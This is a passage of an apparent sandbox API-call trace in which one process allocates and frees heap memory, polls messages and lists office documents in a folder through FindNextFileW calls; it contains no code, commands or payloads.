ftLastWriteTime.dwLowDateTime=0x9bf84a30, ftLastWriteTime.dwHighDateTime=0x1d5e55c, nFileSizeHigh=0x0, nFileSizeLow=0x4997, dwReserved0=0x0, dwReserved1=0x0, cFileName="1L1L.xlsx", cAlternateFileName="1L1L~1.XLS")) returned 1 [0259.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0259.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0259.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0259.099] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0259.100] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0259.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0259.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0259.100] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0259.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0259.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0259.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0259.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0259.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0259.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0259.105] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0259.105] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0259.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0259.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0259.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0259.105] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7d66ea0, ftCreationTime.dwHighDateTime=0x1d5e682, ftLastAccessTime.dwLowDateTime=0x2a9d9ec0, ftLastAccessTime.dwHighDateTime=0x1d5e4a4, ftLastWriteTime.dwLowDateTime=0x2a9d9ec0, ftLastWriteTime.dwHighDateTime=0x1d5e4a4, nFileSizeHigh=0x0, nFileSizeLow=0x42be, dwReserved0=0x0, dwReserved1=0x0, cFileName="9mu- e5Z.xlsx", cAlternateFileName="9MU-E5~1.XLS")) returned 1 [0259.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0259.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0259.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0259.105] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0259.105] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0259.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0259.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0259.106] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0259.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0259.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0259.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0259.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0259.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0259.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0259.106] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0259.106] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0259.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0259.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0259.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0259.106] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23faadc0, ftCreationTime.dwHighDateTime=0x1d5eb5b, ftLastAccessTime.dwLowDateTime=0x22475c70, ftLastAccessTime.dwHighDateTime=0x1d5cde3, ftLastWriteTime.dwLowDateTime=0x22475c70, ftLastWriteTime.dwHighDateTime=0x1d5cde3, nFileSizeHigh=0x0, nFileSizeLow=0xa512, dwReserved0=0x0, dwReserved1=0x0, cFileName="BDml_a2hzV.docx", cAlternateFileName="BDML_A~1.DOC")) returned 1 [0259.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0259.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0259.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0259.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0259.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0259.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0259.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0259.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0259.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0259.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0259.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0259.107] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0259.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0259.107] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0259.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0259.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0259.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0259.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0259.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0259.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0259.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0259.107] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0259.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0259.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0259.107] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.107] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.108] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2e4e750, ftCreationTime.dwHighDateTime=0x1d58142, ftLastAccessTime.dwLowDateTime=0x1ad4e820, ftLastAccessTime.dwHighDateTime=0x1d5743f, ftLastWriteTime.dwLowDateTime=0x1ad4e820, ftLastWriteTime.dwHighDateTime=0x1d5743f, nFileSizeHigh=0x0, nFileSizeLow=0x15bd9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGmPJ_.pptx", cAlternateFileName="BGMPJ_~1.PPT")) returned 1 [0259.108] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.108] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.108] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.108] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.108] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.108] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 1 [0259.108] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.108] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.108] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.108] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.109] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.109] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0259.109] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.109] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.109] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.109] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.109] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.109] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x968d2090, ftCreationTime.dwHighDateTime=0x1d5e81b, ftLastAccessTime.dwLowDateTime=0xd4e8f6f0, ftLastAccessTime.dwHighDateTime=0x1d5f08d, ftLastWriteTime.dwLowDateTime=0xd4e8f6f0, ftLastWriteTime.dwHighDateTime=0x1d5f08d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FdTMcauZqd", cAlternateFileName="FDTMCA~1")) returned 1 [0259.109] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.109] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.109] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.109] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.110] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3eb8b5a0, ftCreationTime.dwHighDateTime=0x1d5ce6c, ftLastAccessTime.dwLowDateTime=0xe1b73c70, ftLastAccessTime.dwHighDateTime=0x1d5b5c3, ftLastWriteTime.dwLowDateTime=0xe1b73c70, ftLastWriteTime.dwHighDateTime=0x1d5b5c3, nFileSizeHigh=0x0, nFileSizeLow=0x1324e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fuv1mdjpidzq-6YHGh.xlsx", cAlternateFileName="FUV1MD~1.XLS")) returned 1 [0259.110] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.110] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.110] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.110] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.110] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.110] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa804140, ftCreationTime.dwHighDateTime=0x1d5b490, ftLastAccessTime.dwLowDateTime=0x3513a170, ftLastAccessTime.dwHighDateTime=0x1d5b514, ftLastWriteTime.dwLowDateTime=0x3513a170, ftLastWriteTime.dwHighDateTime=0x1d5b514, nFileSizeHigh=0x0, nFileSizeLow=0x12b4b, dwReserved0=0x0, dwReserved1=0x0, cFileName="hYiEt-0f.docx", cAlternateFileName="HYIET-~1.DOC")) returned 1 [0259.110] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.110] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.149] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.149] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.149] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.150] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc77d7e0, ftCreationTime.dwHighDateTime=0x1d5cd35, ftLastAccessTime.dwLowDateTime=0x7fdfbdc0, ftLastAccessTime.dwHighDateTime=0x1d5b6d0, ftLastWriteTime.dwLowDateTime=0x7fdfbdc0, ftLastWriteTime.dwHighDateTime=0x1d5b6d0, nFileSizeHigh=0x0, nFileSizeLow=0x12e2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="ith_1X2kFN3hB-U9.xlsx", cAlternateFileName="ITH_1X~1.XLS")) returned 1 [0259.151] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.151] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.152] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.152] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.152] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.152] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe622a990, ftCreationTime.dwHighDateTime=0x1d5ea8c, ftLastAccessTime.dwLowDateTime=0xb20b0420, ftLastAccessTime.dwHighDateTime=0x1d5e656, ftLastWriteTime.dwLowDateTime=0xb20b0420, ftLastWriteTime.dwHighDateTime=0x1d5e656, nFileSizeHigh=0x0, nFileSizeLow=0xf8af, dwReserved0=0x0, dwReserved1=0x0, cFileName="J30FxxC-.doc", cAlternateFileName="")) returned 1 [0259.152] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.152] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.153] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.153] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.153] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.153] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c6df6a0, ftCreationTime.dwHighDateTime=0x1d5abfb, ftLastAccessTime.dwLowDateTime=0xd7dbe6f0, ftLastAccessTime.dwHighDateTime=0x1d588ec, ftLastWriteTime.dwLowDateTime=0xd7dbe6f0, ftLastWriteTime.dwHighDateTime=0x1d588ec, nFileSizeHigh=0x0, nFileSizeLow=0xa81, dwReserved0=0x0, dwReserved1=0x0, cFileName="kw9ZLIvDnQk.xlsx", cAlternateFileName="KW9ZLI~1.XLS")) returned 1 [0259.153] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.153] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.153] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.154] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.154] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.154] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a307f0, ftCreationTime.dwHighDateTime=0x1d58c15, ftLastAccessTime.dwLowDateTime=0x6ea54c0, ftLastAccessTime.dwHighDateTime=0x1d59407, ftLastWriteTime.dwLowDateTime=0x6ea54c0, ftLastWriteTime.dwHighDateTime=0x1d59407, nFileSizeHigh=0x0, nFileSizeLow=0x5c4b, dwReserved0=0x0, dwReserved1=0x0, cFileName="kZP09G.docx", cAlternateFileName="KZP09G~1.DOC")) returned 1 [0259.154] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.154] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.154] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.154] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.154] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.154] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff1f8730, ftCreationTime.dwHighDateTime=0x1d5e60c, ftLastAccessTime.dwLowDateTime=0xf907a110, ftLastAccessTime.dwHighDateTime=0x1d5ed24, ftLastWriteTime.dwLowDateTime=0xf907a110, ftLastWriteTime.dwHighDateTime=0x1d5ed24, nFileSizeHigh=0x0, nFileSizeLow=0x153c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="L7MGGQIaJ.pptx", cAlternateFileName="L7MGGQ~1.PPT")) returned 1 [0259.154] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.154] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.155] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.155] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.155] PeekMessageW (in: 